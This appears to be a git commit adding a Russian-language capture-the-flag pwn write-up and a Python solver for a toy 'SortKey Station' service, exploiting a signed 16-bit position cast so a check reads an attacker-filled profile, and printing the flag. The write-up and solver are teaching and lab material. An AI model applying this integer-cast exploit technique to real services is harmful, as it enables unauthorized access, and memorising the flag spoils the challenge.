Init. Commit
This commit is contained in:
@@ -0,0 +1,35 @@
|
||||
<h1 align="center">SortKey Station</h1>
|
||||
|
||||
<p align="center">
|
||||
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
|
||||
<img src="https://img.shields.io/badge/difficulty-easy-brightgreen" alt="easy"/>
|
||||
</p>
|
||||
|
||||
Складская станция сортирует этикетки и поддерживает старый формат ключей `+POS.C`. В ELF `sortkey-station` находим приведение позиции к знаковому 16-битному числу. Большая положительная позиция после него превращается в отрицательное смещение.
|
||||
|
||||
## Решение
|
||||
|
||||
При проверке старого ключа сервис обращается к `key_buf + (int16_t)pos` и сравнивает строку по этому адресу с `SORT-EXPORT`. Если подобрать `pos`, чтение уйдёт перед началом ключа — в профиль партии, содержимое которого можно задать.
|
||||
|
||||
Нужная область находится за 32 байта до `key_buf`. В 16-битной арифметике:
|
||||
|
||||
$$65504 - 65536 = -32.$$
|
||||
|
||||
Значит, подходит ключ `+65504.0`. Теперь размещаем строку допуска в профиле:
|
||||
|
||||
```python
|
||||
profile = b"A" * 64 + b"SORT-EXPORT"
|
||||
legacy_key = b"+65504.0"
|
||||
```
|
||||
|
||||
Строка допуска начинается после 64 байт заполнения в профиле, по смещению `-32` от начала `key_buf`.
|
||||
|
||||
В `1) set batch profile` отправляем профиль, затем в `2) set legacy sort key` задаём `+65504.0`. Вызываем `3) dry-run sort`, чтобы сервис проверил допуск, и забираем результат через `4) export station batch`.
|
||||
|
||||
Проверка читает `SORT-EXPORT` из подставленного профиля и принимает его за разрешение на экспорт. В ответе получаем флаг.
|
||||
|
||||
[Солвер](solve/solve.py).
|
||||
|
||||
## Флаг
|
||||
|
||||
`caplag{legacy_sort_pointer_found_the_batch_grant}`
|
||||
@@ -0,0 +1,73 @@
|
||||
#!/usr/bin/env python3
|
||||
import argparse
|
||||
import os
|
||||
import socket
|
||||
import struct
|
||||
import subprocess
|
||||
import sys
|
||||
|
||||
class Tube:
|
||||
def __init__(self, sock=None, proc=None):
|
||||
self.sock = sock
|
||||
self.proc = proc
|
||||
def recv(self, n=4096):
|
||||
if self.sock:
|
||||
return self.sock.recv(n)
|
||||
return os.read(self.proc.stdout.fileno(), n)
|
||||
def send(self, data):
|
||||
if self.sock:
|
||||
self.sock.sendall(data)
|
||||
else:
|
||||
os.write(self.proc.stdin.fileno(), data)
|
||||
def sendline(self, data):
|
||||
self.send(data + b"\n")
|
||||
def recvuntil(self, marker):
|
||||
out = b""
|
||||
while marker not in out:
|
||||
chunk = self.recv(1)
|
||||
if not chunk:
|
||||
raise EOFError(out)
|
||||
out += chunk
|
||||
return out
|
||||
|
||||
def symbol_value(binary, name):
|
||||
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
|
||||
for line in out.splitlines():
|
||||
fields = line.split()
|
||||
if len(fields) >= 8 and fields[-1] == name:
|
||||
return int(fields[1], 16)
|
||||
raise RuntimeError(f"symbol not found: {name}")
|
||||
|
||||
def connect(args):
|
||||
if args.local:
|
||||
env = os.environ.copy()
|
||||
env["CTF_FLAG"] = args.flag
|
||||
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
|
||||
return Tube(proc=proc)
|
||||
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
|
||||
|
||||
def choose(io, value):
|
||||
io.recvuntil(b">")
|
||||
io.sendline(str(value).encode())
|
||||
|
||||
def main():
|
||||
p = argparse.ArgumentParser()
|
||||
p.add_argument("--host", default="127.0.0.1")
|
||||
p.add_argument("--port", type=int, default=31340)
|
||||
p.add_argument("--local", action="store_true")
|
||||
p.add_argument("--binary", default="../public/sortkey-station")
|
||||
p.add_argument("--flag", default="caplag{legacy_sort_pointer_found_the_batch_grant}")
|
||||
args = p.parse_args()
|
||||
io = connect(args)
|
||||
choose(io, 1)
|
||||
io.recvuntil(b"profile:")
|
||||
io.sendline(b"A" * 64 + b"SORT-EXPORT")
|
||||
choose(io, 2)
|
||||
io.recvuntil(b"legacy key:")
|
||||
io.sendline(b"+65504.0")
|
||||
choose(io, 3)
|
||||
choose(io, 4)
|
||||
data = io.recvuntil(b"}")
|
||||
print(data[data.rfind(b"caplag{"):].decode())
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
Reference in New Issue
Block a user